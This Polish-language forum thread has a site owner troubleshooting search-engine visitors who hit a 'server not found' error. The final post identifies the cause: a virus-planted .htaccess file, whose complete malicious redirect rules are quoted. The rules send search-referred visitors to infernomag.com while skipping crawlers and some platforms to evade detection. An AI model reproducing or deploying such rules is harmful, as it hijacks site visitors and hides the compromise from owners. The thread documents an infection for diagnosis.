Elektroda.pl
Elektroda.pl
X
Elektroda.pl
Proszę, dodaj wyjątek dla www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Google nie może odnaleźć serwera, po domenie wszystko działa poprawnie

Patrykosp 15 Sty 2012 19:00 1909 9
  • #1 15 Sty 2012 19:00
    Patrykosp
    Poziom 9  

Witam, mam taki dość nietypowy problem. Otóż posiadam dwie strony http://tnij.org/osplb i http://tnij.org/oyps . Pierwsza jest postawiona na joomli, zaś druga napisana ręcznie w HTML`u (nie mają ze sobą nic wspólnego). Po wpisaniu w google frazy "osp xxx" lub "yyy" i kliknięciu na wynik, wyrzuca błąd o nie odnalezieniu serwera. Jeżeli odświeżymy stronę, wszystko działa bez problemu. Nie jest to raczej problem domeny ponieważ obie są wykupione u różnych dostawców. Po kontakcie z obsługą serwera otrzymałem odpowiedz:

Code:
    Wynik MTR jest wzorowy. Ruch zwrotny również idealnie przechodzi. IP nie jest zablokowane na firewallu.

Serwer działa prawidłowo i bez przeciążeń. Strony ładują się poprawnie (przetestowane z 2 niezależnych łącz operatorów Rzeszowskich).

Serwer jest wykupiony w firmie linuxpl.com. Załączam parę screenów z błędami:
    Link

0 9
  • #2 15 Sty 2012 19:16
    bogiebog
    Specjalista Sieci, Internet

Uruchom komputer w trybie awaryjnym + obsługa sieci, czy problem nadal występuje ?

0
  • #3 15 Sty 2012 19:31
    Patrykosp
    Poziom 9  

w trybie awaryjnym również występuje ten błąd. Znajomi sprawdzili także to z różnych lokalizacji (Gdańsk, Warszawa, Poznań) i różnych przeglądarek (opera, mozilla, chrome, IE), na wszystkim występuje taki sam błąd. Może coś jest z plikiem htaccess?

0
  • #4 15 Sty 2012 20:01
    bogiebog

Zainstaluj wireshark-a, przechwytywanie pakietów,

- uruchom przechwyt w wireshark-u
    - wygeneruj błąd

Zinterpretuj wyniki lub zapisz pakiety do pliku *.pcap i załącz tutaj jako zip.

Dodano po 6 [minuty]:

Patrykosp napisał:
    po domenie wszystko działa poprawnie

Tzn po IP nie działa ?
    To by oznaczało że masz virtual hosting www, i tylko po domenie będzie działać.

Dodano po 1 [minuty]:

Patrykosp napisał:
    Po wpisaniu w google frazy "osp lubichowo" lub "obiektywni" i kliknięciu na wynik, wyrzuca błąd o nie odnalezieniu serwera

Z twoich obrazków wynika że nie wpisujesz do googla ale na stronie innego serwera.

0
  • #5 15 Sty 2012 21:32
    Patrykosp
    Poziom 9  

bogiebog napisał:

Dodano po 6 [minuty]:
    Patrykosp napisał:
    po domenie wszystko działa poprawnie

Tzn po IP nie działa ?
    To by oznaczało że masz virtual hosting www, i tylko po domenie będzie działać.

Nie mogę sprawdzić po IP ponieważ na serwerze jest kilka różnych użytkowników. Jak chcesz to możesz sprawdzić i spignować stronę.

bogiebog napisał:

Dodano po 1 [minuty]:
    Patrykosp napisał:
    Po wpisaniu w google frazy "osp lubichowo" lub "obiektywni" i kliknięciu na wynik, wyrzuca błąd o nie odnalezieniu serwera

Z twoich obrazków wynika że nie wpisujesz do googla ale na stronie innego serwera.

rzecz w tym, że wpisuję w google frazę, po czym przekierowuje mnie na jakąś dziwną stronę i po odświeżeniu wszystko zaczyna działać.

Zrobiłem test w wireshark-u, wyniki załączyłem poniżej.

0
  • #6 15 Sty 2012 22:29
    bogiebog

Ja nie widze żadnego pakietu do googla.

Pokaż zrzuty co dokładnie robisz, krok po kroku.

Obrazki dodaj w/g zasad tego forum więc zanim napiszesz następnego posta popraw poprzednie swoje posty

Co masz w pliku %systemroot%\system32\drivers\etc\hosts ?

Dodano po 4 [minuty]:

Zamieść OTL loga.

0
  • #7 17 Sty 2012 21:31
    Patrykosp
    Poziom 9  

myślę, że nie ma sensu dokładna analiza mojego połączenia ponieważ błąd występuje u prawie wszystkich. Wina leży po stronie strony/serwera, tylko trzeba ustalić co dokładnie zawodzi.

0
  • #8 17 Sty 2012 22:00
    bogiebog

IP twojego serwera ?

Dodano po 3 [minuty]:

Pisałeś że wpisujesz na stronie googla wyszukiwanie, ale na pcap logu tego wcale nie ma, tzn nie ma połączenia http do serwera googla na URL "/search"

0
  • #9 17 Sty 2012 22:02
    Patrykosp
    Poziom 9  

Code:
    188.40.69.215

bogiebog napisał:

Pisałeś że wpisujesz na stronie googla wyszukiwanie, ale na pcap logu tego wcale nie ma, tzn nie ma połączenia http do serwera googla na URL "/search"

znalazłem w internecie poradnik do programu Wireshark, mogłem coś źle zrobić ponieważ pierwszy raz obsługiwałem ten program.

0
  • #10 21 Sty 2012 14:39
    Patrykosp
    Poziom 9  

Witam, znalazłem już przyczynę błędu. Jakiś wirus dodał automatycznie w kilku miejscach na serwerze plik .htaccess z kodem przekierowującym wyniki m.in. z google na infernomag.com.

Oto kod błędu;

Cytat:
    # exgocgkctswo
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^GET$
    RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
    RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
    RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
    RewriteCond %{HTTPS} ^off$
    RewriteRule ^(.*)$ http://infernomag.com/cgi-bin/r.cgi?p=15005&i...&j=321&m=0993e742d3c933e777309d7e0d464cc0&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
    # exgocgkctswo

0